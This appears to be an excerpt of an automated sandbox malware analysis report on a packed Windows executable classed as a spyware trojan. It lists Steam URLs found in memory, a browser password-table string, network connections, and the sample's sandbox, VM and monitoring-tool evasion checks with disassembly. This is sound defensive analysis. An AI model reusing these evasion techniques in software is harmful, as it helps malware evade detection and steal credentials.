            Source: file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: file.exe, 00000000.00000003.1690568055.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
            Source: file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C0e3d185a3e106e7
            Source: file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: file.exe, 00000000.00000003.1718877156.0000000005C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: file.exe, 00000000.00000003.1718877156.0000000005C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: file.exe, 00000000.00000003.1718877156.0000000005C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: file.exe, 00000000.00000003.1700772120.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
            Source: file.exe, 00000000.00000003.1700849717.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-
            Source: file.exe, 00000000.00000003.1700628151.00000000012D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49739 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .rsrc
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: Section: ZLIB complexity 0.9995487830033003
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@10/2
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exe, 00000000.00000003.1719103299.0000000005C14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exeVirustotal: Detection: 43%
            Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: file.exeString found in binary or memory: RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNe
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: file.exeStatic file information: File size 3058688 > 1048576
            Source: file.exeStatic PE information: Raw size of teechqve is bigger than: 0x100000 < 0x2c1600

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.4d0000.0.unpack :EW;.rsrc :W;.idata :W;teechqve:EW;nqocidhr:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;teechqve:EW;nqocidhr:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: file.exeStatic PE information: real checksum: 0x2f67a0 should be: 0x2f4a1f
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .rsrc
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name: teechqve
            Source: file.exeStatic PE information: section name: nqocidhr
            Source: file.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012F9C2C push 234F6F6Ch; ret 0_3_012F9C31
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012F9C2C push 234F6F6Ch; ret 0_3_012F9C31
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012F9C2C push 234F6F6Ch; ret 0_3_012F9C31
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012F9C2C push 234F6F6Ch; ret 0_3_012F9C31
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012F9C2C push 234F6F6Ch; ret 0_3_012F9C31
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB71A push ecx; ret 0_3_012FB743
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB71A push ecx; ret 0_3_012FB743
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB71A push ecx; ret 0_3_012FB743
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB71A push ecx; ret 0_3_012FB743
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB71A push ecx; ret 0_3_012FB743
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB71A push ecx; ret 0_3_012FB743
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB71A push ecx; ret 0_3_012FB743
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012F9F6A push ecx; ret 0_3_012F9FA1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012F9F6A push ecx; ret 0_3_012F9FA1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012F9F6A push ecx; ret 0_3_012F9FA1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012F9F6A push ecx; ret 0_3_012F9FA1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012F9F6A push ecx; ret 0_3_012F9FA1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB9AA push ds; ret 0_3_012FB9AB
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB9AA push ds; ret 0_3_012FB9AB
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB9AA push ds; ret 0_3_012FB9AB
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB9AA push ds; ret 0_3_012FB9AB
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB9AA push ds; ret 0_3_012FB9AB
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB9AA push ds; ret 0_3_012FB9AB
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FB9AA push ds; ret 0_3_012FB9AB
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FDFA8 push eax; retf 0_3_012FDFA9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FDFA8 push eax; retf 0_3_012FDFA9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FDFA8 push eax; retf 0_3_012FDFA9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FDFA8 push eax; retf 0_3_012FDFA9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FDFA8 push eax; retf 0_3_012FDFA9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FDFA8 push eax; retf 0_3_012FDFA9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012FDFA8 push eax; retf 0_3_012FDFA9
            Source: file.exeStatic PE information: section name: entropy: 7.982552792221966

            Boot Survival

            barindex
            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes / dynamic malware analysis system (registry check)
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C93D4 second address: 6C93E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C93E0 second address: 6C9404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F377CE47997h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C9404 second address: 6C9409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C9409 second address: 6C9426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F377CE47986h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F377CE47986h 0x00000017 jnp 00007F377CE47986h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C9426 second address: 6C942A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C95A9 second address: 6C95AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C9997 second address: 6C99B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F377C5325FBh 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC2CC second address: 6CC2D2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC2D2 second address: 6CC2D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC2D7 second address: 6CC31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jno 00007F377CE4799Fh 0x00000012 xor edi, 19400081h 0x00000018 push 00000000h 0x0000001a mov edx, dword ptr [ebp+122D3BE0h] 0x00000020 call 00007F377CE47989h 0x00000025 push esi 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC31D second address: 6CC334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 jns 00007F377C5325ECh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC334 second address: 6CC360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F377CE47990h 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 jnl 00007F377CE4798Ch 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC360 second address: 6CC366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC366 second address: 6CC374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC374 second address: 6CC3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377C5325F7h 0x00000009 popad 0x0000000a pop esi 0x0000000b pop eax 0x0000000c xor dword ptr [ebp+122D1DFFh], ebx 0x00000012 push 00000003h 0x00000014 or dword ptr [ebp+122D3015h], eax 0x0000001a push 00000000h 0x0000001c cmc 0x0000001d push 00000003h 0x0000001f sub dword ptr [ebp+122D1D5Dh], eax 0x00000025 call 00007F377C5325E9h 0x0000002a jmp 00007F377C5325EBh 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F377C5325F5h 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC3D7 second address: 6CC42F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F377CE47994h 0x00000008 jmp 00007F377CE4798Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 je 00007F377CE47988h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f pop eax 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 pushad 0x00000024 jmp 00007F377CE47997h 0x00000029 pushad 0x0000002a ja 00007F377CE47986h 0x00000030 push edi 0x00000031 pop edi 0x00000032 popad 0x00000033 popad 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC42F second address: 6CC45C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub dword ptr [ebp+122D1DF8h], eax 0x0000000e lea ebx, dword ptr [ebp+1246C1B5h] 0x00000014 clc 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 push edi 0x00000018 js 00007F377C5325E6h 0x0000001e pop edi 0x0000001f pushad 0x00000020 push eax 0x00000021 pop eax 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
